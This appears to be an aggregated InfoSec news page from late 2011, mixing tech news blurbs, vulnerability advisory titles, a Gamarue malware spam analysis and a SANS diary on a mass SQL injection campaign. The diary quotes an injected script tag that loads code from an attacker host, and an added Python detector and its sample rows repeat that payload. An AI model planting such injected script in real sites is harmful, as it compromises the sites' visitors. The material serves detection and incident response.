Hackin9

InfoSec News

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
iPhone users can turn off the Carrier IQ software that's raised a ruckus among consumers, bloggers and privacy advocates with just four taps.
 
Verizon Wireless said Thursday it doesn't add to its phones any software from Carrier IQ, the company that has come under fire in the past few days for what some say amounts to spying on mobile phone users.
 
The recent disclosure that top mobile phone providers are using software from Carrier IQ that critics say can gather and track all sorts of personal data from a user's smartphone has sparked a firestorm of controversy.
 
CoDeSys Buffer Overflow Vulnerability and Integer Overflow Vulnerability
 
The flooding in Thailand that has left the storage industry with a dearth of hard drives has also caused a temporary rush on solid-state drives, according to DRAMeXchange.
 
As the end of the year approaches, a look at what people searched for and shared online can start painting a picture of what most interested people during 2011.
 
Web tracker StatCounter says that for the first time, usage of Google's Chrome Web browser has surpassed Firefox to become the second most popular browser, behind Microsoft
 
Serendipity 'serendipity[filter][bp.ALT]' Parameter Cross Site Scripting Vulnerability
 
We've had several reports (thanks guys) of sites being injected with the following string:
</title><script src=hXXp://lilupophilupop.com/sl.php></script>
Typically it is inserted into several tables. From the information gathered so far it looks targeted at ASP, IIS and MSSQL backends, but that is just speculation. If you find that you have been infected please let us know, and if you can share packets or logs please upload them on the contact form.
Mark
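As an added example (not from the diary above), a Python check that scans text columns dumped from the affected tables for injected script tags pointing at an external host, tolerating the defanged hXXp form and case variations; the allowlist host and the sample rows are constructed for the example:

```python
import re

# Matches <script src=...> whose URL uses http/https or the defanged hXXp form,
# capturing the host. IGNORECASE also covers <SCRIPT SRC=...> variants.
INJECTED_SCRIPT = re.compile(
    r"<script\s+src\s*=\s*['\"]?\s*(?:h(?:tt|xx)ps?://)([^/'\"\s>]+)[^>]*>",
    re.IGNORECASE,
)

# Hosts the application legitimately loads scripts from (assumption for the example).
ALLOWED_HOSTS = {"cdn.example.com"}

def find_injected_scripts(value):
    """Return hosts referenced by script tags in one column value, minus the allowlist."""
    hosts = [m.group(1).lower() for m in INJECTED_SCRIPT.finditer(value)]
    return [h for h in hosts if h not in ALLOWED_HOSTS]

def scan_rows(rows):
    """rows: iterable of (table, column, primary_key, value). Returns one finding per hit."""
    findings = []
    for table, column, pk, value in rows:
        if not isinstance(value, str):
            continue  # non-text columns cannot carry an injected tag
        for host in find_injected_scripts(value):
            findings.append((table, column, pk, host))
    return findings

def summarize(findings):
    """Count hits per (table, host) so responders see how far one payload has spread."""
    counts = {}
    for table, _column, _pk, host in findings:
        counts[(table, host)] = counts.get((table, host), 0) + 1
    return counts

# Constructed sample rows standing in for a dump of text columns from an MSSQL backend.
SAMPLE_ROWS = [
    ("Products", "Description", 1, "Blue widget</title><script src=http://lilupophilupop.com/sl.php></script>"),
    ("Products", "Description", 2, "Plain red widget"),
    ("News", "Body", 7, '<p>Hi</p><script src="https://cdn.example.com/app.js"></script>'),
    ("News", "Body", 8, "<SCRIPT SRC='hXXp://lilupophilupop.com/sl.php'></SCRIPT>"),
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print("injected script in %s.%s row %s -> %s" % finding)
    print(summarize(scan_rows(SAMPLE_ROWS)))
```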
 
VirtualSharp hopes to soon let its customers set up disaster recovery plans that fail over from their private clouds to public clouds, the company announced this week at the CloudBeat conference in Redwood City, California.
 
A snapshot of high-tech development in Massachusetts by the federal government found that tech employment in the state declined 15% between 2001 and 2009. Tech salaries, however, rose about 30%.
 
Sprint Nextel may help finance Clearwire's LTE network and keep offering WiMax service through 2015 under a set of agreements worth as much as US$1.6 billion that the companies laid out on Thursday.
 
The U.S. Federal Communications Commission has invited questions about its impartiality with a staff report laying out concerns about AT&T's proposed acquisition of rival mobile carrier T-Mobile USA, AT&T said Thursday.
 
Google's open-source Android 4.0 operating system for smartphones and tablets has been ported to work with x86 processors, a member of an open-source project involved in the effort said this week.
 
Amid what's snowballing into a major privacy controversy, AT&T, Sprint, HTC and Samsung today confirmed that their mobile phones integrate a controversial piece of smartphone tracking software from a company called Carrier IQ.
 
Cyrus IMAPd NNTP Logic Error Authentication Bypass Vulnerability
 
Cyrus IMAP Server 'index_get_ids()' NULL Pointer Dereference Denial Of Service Vulnerability
 
[SECURITY] [DSA 2356-1] openjdk-6 security update
 
Re: Serendipity 'serendipity[filter][bp.ALT]' Cross-Site Scripting vulnerability
 
Re: Serendipity freetag plugin 'serendipity[tagview]' Cross-Site Scripting vulnerability
 
Google's Chrome edged Mozilla's Firefox last month to take the number two spot in the browser popularity wars, an Irish metrics company said.
 
Ariadne 2.7.6 Multiple XSS vulnerabilities
 
Re: Contao 2.10.1 Cross-site scripting vulnerability
 
Intel has taken on a challenge from Samsung Electronics head-on by picking up the pace and regaining its long-held dominance in the worldwide chip market.
 
For the new release of its WebLogic, Oracle has tailored the enterprise Java application server so that it can be used more easily in cloud deployments.
 
Microsoft's declaration this week that Office 365 is enjoying unprecedented levels of sales success didn't fully convince some industry experts who were expecting the company to back up its claims with more concrete figures and who feel it's too early for a victory lap.
 
Re: Wordpress plugin BackWPup Remote and Local Code Execution Vulnerability - SOS-11-003
 
[security bulletin] HPSBPI02728 SSRT100692 rev.1 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default
 
Re: Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities
 
Blackberry Mobile Fusion hit our radar for obvious reasons. The exploding mobile/devices space presents deep challenges from a device management perspective, but imagine a focused security model with broad device diversity. This is the solution RIM has announced in Blackberry Mobile Fusion, including, from our slightly more narrow perspective:

Asset management and configuration management
Security and policy definition and management
Secure and protect lost or stolen devices (remote lock, wipe)
User- and group-based administration
Application and software management
Connectivity management (VPN, certificates)

This is an ambitious offering and if secure device management at scale worries you, this announcement is well worth your time to read.
http://press.rim.com/release.jsp?id=5285
 
Contao 'X_FORWARDED_FOR' HTTP Header Arbitrary Script Injection Vulnerability
 
Re: [MajorSecurity SA-081]Contao CMS 2.9.2 - Persistent Cross Site Scripting Issue
 
Shaw reviews the Samsung Galaxy Tab 7.0 Plus and the Motorola Xoom 4G LTE.
 
Apple iPhone 4S owners rated their smartphones higher than did people using last year's iPhone 4, ChangeWave Research said today.
 
Cisco Systems in the first half of next year will release a tablet with a larger screen than the current Cius, the first move in the company's long-term plans to introduce tablets in multiple sizes, an executive said this week.
 
 
Re: Wordpress enable-latex plugin Remote File Include Vulnerabilities
 
[SECURITY] [DSA 2355-1] clearsilver security update
 
A coding error in the Adobe Flex SDK could cause developers to create applications with cross-site scripting issues, according to an advisory issued by Adobe Systems.

 
There's a phenomenon that economists describe as a "race to the bottom," where vendors compete by undercutting in price, which leads to a reduction in quality and service. In businesses like airlines, trains, telecoms -- with huge fixed costs -- these downward spirals of service can last for decades because, fundamentally, the customers don't have that much choice. Any vendor foolish enough to offer great service will see their costs go up...and their sales go down. Despite complaints about lousy service, the customer won't tolerate big price increases.
 
If nothing else, the now disputed "hacking" of an Illinois water utility has brought the spotlight back to shine on the vulnerability of our national infrastructure.
 
Sharp announced a camera module for smartphones that shoots 12.1 megapixels and is just 5.47-mm (0.22 inches) thick, which it says is the thinnest in the industry.
 
Walmart has launched its Shopycat application, that uses information on the interests of friends on Facebook to make recommendations on gifts for them from Walmart stores and other sites.
 
WikiLeaks on Thursday released a broad study of the brisk global trade in surveillance products, which founder Julian Assange claimed exposes a broad risk to peoples' privacy, while also launching a revamped submissions platform.
 
Here's one that's been making the rounds over the last few days and showed up in my SPAM folder with a helpful attachment. I'm one of those weird people who look to explore the depths of said SPAM folder to see what fun I might find therein.
As an example:

From: United States Postal Service [email protected]
Subject: USPS Delivery Failure Notification

Hello!
Unfortunately we failed to deliver the postal package you have sent on the blah, blah, blah.

Ruh-roh!
The attachment is USPS report.pdf.zip and once unpacked yields USPS report.pdf.exe (MD5: 1fd6c3470b81f278572a27a1bf34cdf2)
A hash search finds this sample already submitted to ThreatExpert and VirusTotal, yielding results that refer to the Gamarue family; you may have seen similar ones with regard to ACH or Federal Reserve SPAM.
Data from the Microsoft Malware Protection Center shows a steady level of activity for the family overall and indications that this sample is a new variant from the last couple of days (per the hash).
This particular sample, as is consistent with other Gamarue samples, modifies HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run and injects itself into wuauclt.exe.

These little exercises are always an opportunity to run output through some of my favorite tools (unabashed tool geek).
I ran the PCAP acquired during runtime through NetworkMiner 1.2 which reassembled the following malware downloaded when it phoned home to 85.121.38.27 (htobertur.ru):
Trojan:Win32/FakeSysdef (MD5: 8ae00c31b5546ee5a1b107c997171bde)
Trojan.Win32.Scar.fevl (MD5: d476533ea0aacb8244dfe0f5e65862a9)
A quick review of the Romanian ASN (AS43215 Monyson Grup S.A.) for the above mentioned IP address shows a tendency towards association with the likes of Blackhole (as referred to in Pedro's diary), fake AV, pharma SPAM, Zeus, SpyEye, and other instruments of ne'er-do-wells and malcontents. Zoinks!
A quick Maltego run on Monyson Grup S.A. as a phrase entity proves this out.

As a friend commented with both humor and sincerity: stay out of that neighborhood.
And they would have gotten away with it too, if it weren't for those meddling kids.

Russ McRee

@holisticinfosec
 
Renesas Electronics will upgrade its Japanese factories so that they can be up and running within a month after a major quake like the one that struck Japan in March.
 
Vodafone's Global Enterprise is strengthening its professional services arm by acquiring British consultant Bluefish Communications, which will form the basis of a new unified communication and collaboration practice, the operator said on Thursday.
 
As students study other technologies, vendors try to develop new talent and offer tools to fill the gap for these critical systems
 
Sure, there are budget constraints and far fewer resources. But being an IT leader in a small shop has numerous benefits, not the least of which are agility and a greater ability to influence the business.
 
AT&T and China Telecom signed an agreement on Wednesday to share telecommunications infrastructure across the U.S. and China, in a move meant to help their business customers.
 
Alibaba Group said it has not decided to be part of a bid for the whole of Yahoo, countering reports that the Chinese company is in talks with private equity firms to make such a bid.
 
Mozilla is mulling the end of Firefox support for Mac owners running Leopard, the Apple operating system released four years ago, developer discussions show.
 
After years of fighting Intel and not faring so well, Advanced Micro Devices is no longer going to focus on its main chip rival.
 
ClearSilver 'neo_cgi' Module Format String Vulnerability
 

Posted by InfoSec News on Dec 01

http://www.computerworld.com/s/article/9222293/Duqu_hackers_scrub_evidence_from_command_servers_shut_down_spying_op

By Gregg Keizer
Computerworld
November 30, 2011

The hackers behind the Duqu botnet have shut down their snooping
operation, a security researcher said today.

The 12 known command-and-control (C&C) servers for Duqu were scrubbed of
all files on Oct. 20, 2011, according to Moscow-based Kaspersky Lab.

That was just two days...
 

Posted by InfoSec News on Dec 01

http://news.hjnews.com/news/article_d8c60e9c-1afe-11e1-9c4d-001cc4c002e0.html

By Amy Macavinta
The Herald Journal
November 29, 2011

A senior scientist of Frontier Scientific Inc. of North Logan has been
accused of stealing proprietary information and sending it to a foreign
company in what the FBI says is a rare case of industrial espionage.

According to a criminal complaint filed in U.S. District Court in Salt
Lake City on Nov. 10, Prabhu...
 

Posted by InfoSec News on Dec 01

http://www.wired.com/threatlevel/2011/11/water-pump-hack-mystery-solved/

By Kim Zetter
Threat Level
Wired.com
November 30, 2011

It was the broken water pump heard ’round the world.

Cyberwar watchers took notice this month when a leaked intelligence memo
claimed Russian hackers had remotely destroyed a water pump at an Illinois
utility. The report spawned dozens of sensational stories characterizing it as
the first-ever reported...
 

Posted by InfoSec News on Dec 01

http://www.guardian.co.uk/media/2011/dec/01/gchq-computer-hackers-ad

By Mark Sweney
guardian.co.uk
30 November 2011

The government intelligence service, GCHQ, is aiming to attract the next
generation of web-savvy spies by running an ad campaign that challenges
computer hackers to crack a code to get an interview.

GCHQ, which reports to the foreign secretary and works with MI5 and MI6,
has set up a website that is home to a tricky visual...
 

Posted by InfoSec News on Dec 01

http://www.darkreading.com/database-security/167901020/security/news/232200517/researchers-say-oracle-leaves-databases-needlessly-vulnerable.html

By Ericka Chickowski
Contributing Editor
Dark Reading
Nov 30, 2011

Is Oracle just paying lip service to database security? Some researchers
within the database community think so, complaining that as the software
juggernaut has grown with acquisitions such as the blockbuster Sun deal
it hasn't...
 